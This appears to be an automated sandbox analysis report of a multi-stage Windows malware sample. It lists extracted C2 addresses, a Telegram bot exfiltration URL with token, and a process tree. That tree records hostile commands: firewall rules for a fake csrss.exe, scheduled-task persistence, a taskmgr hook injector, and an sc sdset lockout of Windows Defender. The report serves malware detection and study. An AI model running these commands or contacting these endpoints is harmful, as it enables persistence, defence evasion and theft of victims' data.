Analysis

  • max time kernel
    96s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-04-2024 23:21

General

  • Target

    654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe

  • Size

    1.8MB

  • MD5

    7cc0b2f8e09e9e4718ec9b753d7c92b7

  • SHA1

    7bb4b30ff33baa79cdbe2ef8e26a386281b3bce2

  • SHA256

    654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591

  • SHA512

    fad15d5727882b8e496642101d8e51782306eea29f224d485a2e4d4e11a9ab3894b32e1c57fb311a4efdaabc6bfa51c3a1d5bfb07f71d2abb54c8c2141cb2168

  • SSDEEP

    49152:73/bn+KOPkicNihwbyRg3CGiDasCji8yi:7jn+9NmiYyRg3CGiD1Cji8

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://193.233.132.139

Attributes
  • install_dir

    5454e6f062

  • install_file

    explorta.exe

  • strings_key

    c7a869c5ba1d72480093ec207994e2bf

  • url_paths

    /sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

http://185.172.128.150

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:7000

91.92.252.220:7000

41.199.23.195:7000

saveclinetsforme68465454711991.publicvm.com:7000

Mutex

bBT8anvIxhxDFmkf

Attributes
  • Install_directory

    %AppData%

  • install_file

    explorer.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Xworm Payload 2 IoCs
  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 5 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 32 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 9 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 55 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
    "C:\Users\Admin\AppData\Local\Temp\654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
      "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
        "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
        3⤵
          PID:1364
        • C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
          "C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:3684
        • C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe
          "C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
            4⤵
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:756
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b758ab58,0x7ff9b758ab68,0x7ff9b758ab78
              5⤵
                PID:1632
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:2
                5⤵
                  PID:2596
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                  5⤵
                    PID:4344
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                    5⤵
                      PID:4836
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
                      5⤵
                        PID:1104
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
                        5⤵
                          PID:4108
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4280 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
                          5⤵
                            PID:1552
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3308 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
                            5⤵
                              PID:2888
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4504 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                              5⤵
                                PID:1692
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                                5⤵
                                • Modifies registry class
                                PID:4956
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                                5⤵
                                  PID:2444
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                                  5⤵
                                    PID:1020
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
                                    5⤵
                                      PID:3320
                                • C:\Users\Admin\1000017002\2c03579092.exe
                                  "C:\Users\Admin\1000017002\2c03579092.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3020
                            • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                              C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1592
                            • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                              1⤵
                                PID:1844
                              • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4956
                                • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2712
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    3⤵
                                      PID:1020
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 888
                                      3⤵
                                      • Program crash
                                      PID:4796
                                  • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4328
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      3⤵
                                        PID:4376
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        3⤵
                                          PID:2868
                                          • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                                            "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2484
                                          • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                                            "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1864
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                            4⤵
                                              PID:1768
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /C Y /N /D Y /T 3
                                                5⤵
                                                  PID:2684
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 364
                                              3⤵
                                              • Program crash
                                              PID:1068
                                          • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:328
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              3⤵
                                                PID:4872
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 388
                                                3⤵
                                                • Program crash
                                                PID:1740
                                            • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:2108
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
                                                3⤵
                                                • Creates scheduled task(s)
                                                PID:1744
                                            • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3684
                                            • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:1524
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                3⤵
                                                  PID:1428
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  3⤵
                                                    PID:3464
                                                • C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:3772
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                    3⤵
                                                      PID:5856
                                                      • C:\Users\Admin\Pictures\xf34C1uoc4EnKcwdtLQTFQEf.exe
                                                        "C:\Users\Admin\Pictures\xf34C1uoc4EnKcwdtLQTFQEf.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:5460
                                                        • C:\Users\Admin\AppData\Local\Temp\u47o.0.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\u47o.0.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:5740
                                                        • C:\Users\Admin\AppData\Local\Temp\u47o.2\run.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\u47o.2\run.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious behavior: MapViewOfSection
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2348
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\SysWOW64\cmd.exe
                                                            6⤵
                                                              PID:4204
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                7⤵
                                                                  PID:4280
                                                            • C:\Users\Admin\AppData\Local\Temp\u47o.3.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\u47o.3.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:3636
                                                              • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                6⤵
                                                                  PID:5772
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 1416
                                                                5⤵
                                                                • Program crash
                                                                PID:3460
                                                            • C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe
                                                              "C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:4796
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                5⤵
                                                                  PID:4928
                                                                • C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe
                                                                  "C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2128
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -nologo -noprofile
                                                                    6⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:5948
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                    6⤵
                                                                      PID:1032
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                        7⤵
                                                                        • Modifies Windows Firewall
                                                                        PID:4888
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -nologo -noprofile
                                                                      6⤵
                                                                        PID:3564
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -nologo -noprofile
                                                                        6⤵
                                                                          PID:3312
                                                                        • C:\Windows\rss\csrss.exe
                                                                          C:\Windows\rss\csrss.exe
                                                                          6⤵
                                                                            PID:4916
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -nologo -noprofile
                                                                              7⤵
                                                                                PID:1232
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                7⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3552
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks /delete /tn ScheduledUpdate /f
                                                                                7⤵
                                                                                  PID:5968
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -nologo -noprofile
                                                                                  7⤵
                                                                                    PID:4596
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -nologo -noprofile
                                                                                    7⤵
                                                                                      PID:4192
                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                      7⤵
                                                                                        PID:3144
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          8⤵
                                                                                            PID:5420
                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                          7⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2892
                                                                                        • C:\Windows\windefender.exe
                                                                                          "C:\Windows\windefender.exe"
                                                                                          7⤵
                                                                                            PID:5540
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                              8⤵
                                                                                                PID:5288
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                  9⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1268
                                                                                      • C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe
                                                                                        "C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5680
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -nologo -noprofile
                                                                                          5⤵
                                                                                            PID:2920
                                                                                          • C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe
                                                                                            "C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5380
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -nologo -noprofile
                                                                                              6⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:6108
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                                              6⤵
                                                                                                PID:4528
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                  7⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:3844
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -nologo -noprofile
                                                                                                6⤵
                                                                                                  PID:4192
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -nologo -noprofile
                                                                                                  6⤵
                                                                                                    PID:3880
                                                                                              • C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
                                                                                                "C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe" --silent --allusers=0
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Enumerates connected drives
                                                                                                PID:5980
                                                                                                • C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
                                                                                                  C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a49e1d0,0x6a49e1dc,0x6a49e1e8
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5072
